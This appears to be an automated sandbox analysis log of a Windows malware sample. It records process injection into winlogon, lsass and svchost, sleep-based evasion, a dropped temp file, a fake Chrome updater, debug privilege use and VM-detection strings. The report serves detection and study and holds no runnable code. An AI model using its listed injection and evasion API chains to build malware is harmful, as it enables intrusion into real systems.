                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,5_2_00007FF67E6C10C0
                Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,26_2_00007FF6101910C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5488Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4335Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6313Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3337Jump to behavior
                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 9279Jump to behavior
                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 718Jump to behavior
                Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9924Jump to behavior
                Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9867Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2213
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7323
                Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1811
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6780
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2820
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmpJump to dropped file
                Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_9-14069
                Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_11-21182
                Source: C:\Windows\System32\conhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_10-13987
                Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_8-21177
                Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-432
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 3.7 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 3.6 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 8.4 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeAPI coverage: 1.4 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 7.2 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 7.2 %
                Source: C:\Windows\System32\conhost.exeAPI coverage: 6.1 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 5488 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 4335 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\System32\dialer.exe TID: 8112Thread sleep count: 79 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 6313 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep count: 3337 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 2248Thread sleep count: 9279 > 30Jump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 2248Thread sleep time: -9279000s >= -30000sJump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 2248Thread sleep count: 718 > 30Jump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 2248Thread sleep time: -718000s >= -30000sJump to behavior
                Source: C:\Windows\System32\lsass.exe TID: 7412Thread sleep count: 9924 > 30Jump to behavior
                Source: C:\Windows\System32\lsass.exe TID: 7412Thread sleep time: -9924000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7472Thread sleep count: 237 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7472Thread sleep time: -237000s >= -30000sJump to behavior
                Source: C:\Windows\System32\dwm.exe TID: 6768Thread sleep count: 9867 > 30Jump to behavior
                Source: C:\Windows\System32\dwm.exe TID: 6768Thread sleep time: -9867000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 2940Thread sleep count: 254 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 2940Thread sleep time: -254000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6692Thread sleep count: 253 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6692Thread sleep time: -253000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 832Thread sleep count: 101 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 832Thread sleep time: -101000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6468Thread sleep count: 114 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6468Thread sleep time: -114000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 756Thread sleep count: 197 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 756Thread sleep time: -197000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5180Thread sleep count: 251 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5180Thread sleep time: -251000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7268Thread sleep count: 234 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7268Thread sleep time: -234000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep count: 2213 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep count: 7323 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7752Thread sleep count: 254 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7752Thread sleep time: -254000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 8032Thread sleep count: 246 > 30
                Source: C:\Windows\System32\svchost.exe TID: 8032Thread sleep time: -246000s >= -30000s
                Source: C:\Windows\System32\dialer.exe TID: 2060Thread sleep count: 1811 > 30
                Source: C:\Windows\System32\dialer.exe TID: 2060Thread sleep time: -181100s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 6780 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep count: 2820 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1724Thread sleep count: 241 > 30
                Source: C:\Windows\System32\svchost.exe TID: 1724Thread sleep time: -241000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7852Thread sleep count: 252 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7852Thread sleep time: -252000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7836Thread sleep count: 248 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7836Thread sleep time: -248000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7320Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7320Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2896Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3080Thread sleep count: 205 > 30
                Source: C:\Windows\System32\svchost.exe TID: 3080Thread sleep time: -205000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7408Thread sleep count: 210 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7408Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 332Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 332Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 572Thread sleep count: 250 > 30
                Source: C:\Windows\System32\svchost.exe TID: 572Thread sleep time: -250000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2052Thread sleep count: 222 > 30
                Source: C:\Windows\System32\svchost.exe TID: 2052Thread sleep time: -222000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1212Thread sleep count: 244 > 30
                Source: C:\Windows\System32\svchost.exe TID: 1212Thread sleep time: -244000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1392Thread sleep count: 65 > 30
                Source: C:\Windows\System32\svchost.exe TID: 1392Thread sleep time: -65000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5664Thread sleep count: 34 > 30
                Source: C:\Windows\System32\svchost.exe TID: 5664Thread sleep time: -34000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3412Thread sleep count: 243 > 30
                Source: C:\Windows\System32\svchost.exe TID: 3412Thread sleep time: -243000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3568Thread sleep count: 254 > 30
                Source: C:\Windows\System32\svchost.exe TID: 3568Thread sleep time: -254000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5508Thread sleep count: 253 > 30
                Source: C:\Windows\System32\svchost.exe TID: 5508Thread sleep time: -253000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5652Thread sleep count: 244 > 30
                Source: C:\Windows\System32\svchost.exe TID: 5652Thread sleep time: -244000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1280Thread sleep count: 57 > 30
                Source: C:\Windows\System32\svchost.exe TID: 1280Thread sleep time: -57000s >= -30000s
                Source: C:\Windows\System32\spoolsv.exe TID: 1764Thread sleep count: 53 > 30
                Source: C:\Windows\System32\spoolsv.exe TID: 1764Thread sleep time: -53000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2328Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A69BE3C FindFirstFileExW,8_2_000002EA8A69BE3C
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338EBE3C FindFirstFileExW,9_2_000001CB338EBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027CBE3C FindFirstFileExW,10_2_0000026E027CBE3C
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF1BE3C FindFirstFileExW,11_2_000001C6CEF1BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FBBE3C FindFirstFileExW,12_2_0000025304FBBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2116BE3C FindFirstFileExW,13_2_0000016C2116BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211CBE3C FindFirstFileExW,13_2_0000016C211CBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F4814BE3C FindFirstFileExW,14_2_0000026F4814BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B9234BE3C FindFirstFileExW,15_2_0000029B9234BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923ABE3C FindFirstFileExW,15_2_0000029B923ABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AABE3C FindFirstFileExW,16_2_0000020422AABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287BBE3C FindFirstFileExW,17_2_00000206287BBE3C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847139BE3C FindFirstFileExW,20_2_000002847139BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001829254BE3C FindFirstFileExW,21_2_000001829254BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA6BE3C FindFirstFileExW,24_2_000001BB3DA6BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF4BE3C FindFirstFileExW,25_2_0000029ABCF4BE3C
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DDBE3C FindFirstFileExW,28_2_0000025E81DDBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD8BE3C FindFirstFileExW,29_2_000001CD9AD8BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C39BE3C FindFirstFileExW,31_2_000002AF8C39BE3C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000
                Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000
                Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdownLMEM h+
                Source: svchost.exe, 00000015.00000003.1452190530.0000018292858000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: orvmciTTBL
                Source: svchost.exe, 00000015.00000002.2647250497.0000018291E43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: svchost.exe, 00000010.00000000.1407038647.0000020421C2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                Source: svchost.exe, 0000000E.00000000.1401818846.0000026F47400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: dwm.exe, 0000000B.00000000.1365136495.000001C6CAD12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: lsass.exe, 00000009.00000000.1347907682.000001CB32A13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2635390523.000001CB32A13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1352273729.0000026E02813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2633516653.0000026E02813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2628456366.0000016C20A27000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1400209523.0000016C20A27000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2618112358.0000026F4742A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1401896653.0000026F4742A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2636780084.0000020421C41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1407107755.0000020421C41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: dwm.exe, 0000000B.00000000.1365136495.000001C6CAD12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_5-479
                Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A69B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000002EA8A69B50C
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,5_2_00007FF67E6C2328
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A69B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000002EA8A69B50C
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A697E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000002EA8A697E70
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001CB338E7E70
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001CB338EB50C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000026E027CB50C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000026E027C7E70
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF1B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_000001C6CEF1B50C
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF17E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_000001C6CEF17E70
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000025304FBB50C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000025304FB7E70
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2116B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0000016C2116B50C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C21167E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0000016C21167E70
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0000016C211CB50C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0000016C211C7E70
